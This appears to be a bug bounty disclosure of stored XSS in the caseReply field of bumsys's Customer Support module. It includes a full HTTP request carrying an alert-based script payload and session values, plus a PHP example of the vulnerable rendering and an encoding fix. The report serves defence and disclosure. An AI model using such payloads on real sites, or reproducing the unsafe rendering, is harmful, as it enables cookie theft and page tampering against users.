Stored XSS in Customer Support in unilogies/bumsys
Valid
Reported on Feb 22nd 2023
Description
An attacker can send an XSS payload in the caseReply field of a Customer Support case reply, where it is stored.
Proof of Concept
Request Payload:
POST /xhr/?module=customer-support&page=addCaseReply HTTP/1.1
Host: demo.bumsys.org
Cookie: __80e72166c3164cd4e1f55b5348364ee4f8bc0d12=655mqrm2v9uhktlqpke0h026d4; eid=1; currencySymbol=%E0%A7%B3; keepAlive=1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Csrf-Token: bfbfb6c2834e8b91b86a883cd6c2b4cf18d8ad65
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------3828905606458425251363531674
Content-Length: 570
Origin: https://demo.bumsys.org
Referer: https://demo.bumsys.org/customer-support/case-list/?case_id=2
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close

-----------------------------3828905606458425251363531674
Content-Disposition: form-data; name="caseReply"

<h1>test</h1><body onpageshow=alert(1)>
-----------------------------3828905606458425251363531674
Content-Disposition: form-data; name="replyMode"

Public
-----------------------------3828905606458425251363531674
Content-Disposition: form-data; name="case_id"

2
-----------------------------3828905606458425251363531674
Content-Disposition: form-data; name="caseType"

Refund Request
-----------------------------3828905606458425251363531674--
Response:
HTML Injection and XSS alert
Impact
An XSS vulnerability can allow attackers to steal cookies, create a keylogger, change the integrity of the page, etc.
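The class of fix this report calls for, shown as an added example that is not taken from the bumsys code base: encode the stored reply when it is rendered, so it is always treated as text. The function names and the case-reply wrapper are hypothetical; the sample input is the caseReply value from the request above.

```php
<?php
declare(strict_types=1);

// Hypothetical helpers: the report does not show how bumsys renders replies.

/** Vulnerable pattern: the stored reply is written into the page as markup. */
function renderCaseReplyUnsafe(string $storedReply): string
{
    return '<div class="case-reply">' . $storedReply . '</div>';
}

/** Hardened pattern: encode at output time so the reply can never become markup. */
function renderCaseReplySafe(string $storedReply): string
{
    // ENT_QUOTES encodes both quote styles, which matters in attribute contexts.
    // ENT_SUBSTITUTE replaces invalid UTF-8 instead of returning an empty string.
    $text = htmlspecialchars($storedReply, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');

    // Preserve the author's line breaks; <br> is the only markup added here.
    return '<div class="case-reply">' . nl2br($text, false) . '</div>';
}

/** True when the rendered HTML contains no tags other than the wrapper div and <br>. */
function onlyWrapperMarkup(string $html): bool
{
    return strip_tags($html, '<div><br>') === $html;
}

// caseReply value from the report's request.
$reply = '<h1>test</h1><body onpageshow=alert(1)>';

$unsafe = renderCaseReplyUnsafe($reply);
$safe   = renderCaseReplySafe($reply);

echo "unsafe: {$unsafe}\n";
echo "safe:   {$safe}\n";

// Regression check suitable for a unit test: the unsafe output carries the
// injected <h1> and <body onpageshow=...> tags, the safe output does not.
var_dump(onlyWrapperMarkup($unsafe)); // bool(false)
var_dump(onlyWrapperMarkup($safe));   // bool(true)
```

Encoding belongs at every place the reply is rendered, because the payload is already stored and filtering only on submission leaves existing rows exploitable.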
We are processing your report and will contact the unilogies/bumsys team within 24 hours.
3 months ago
@hatlesswizard, Good finding. We will fix the issue soon. Thank you
hatlesswizard has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7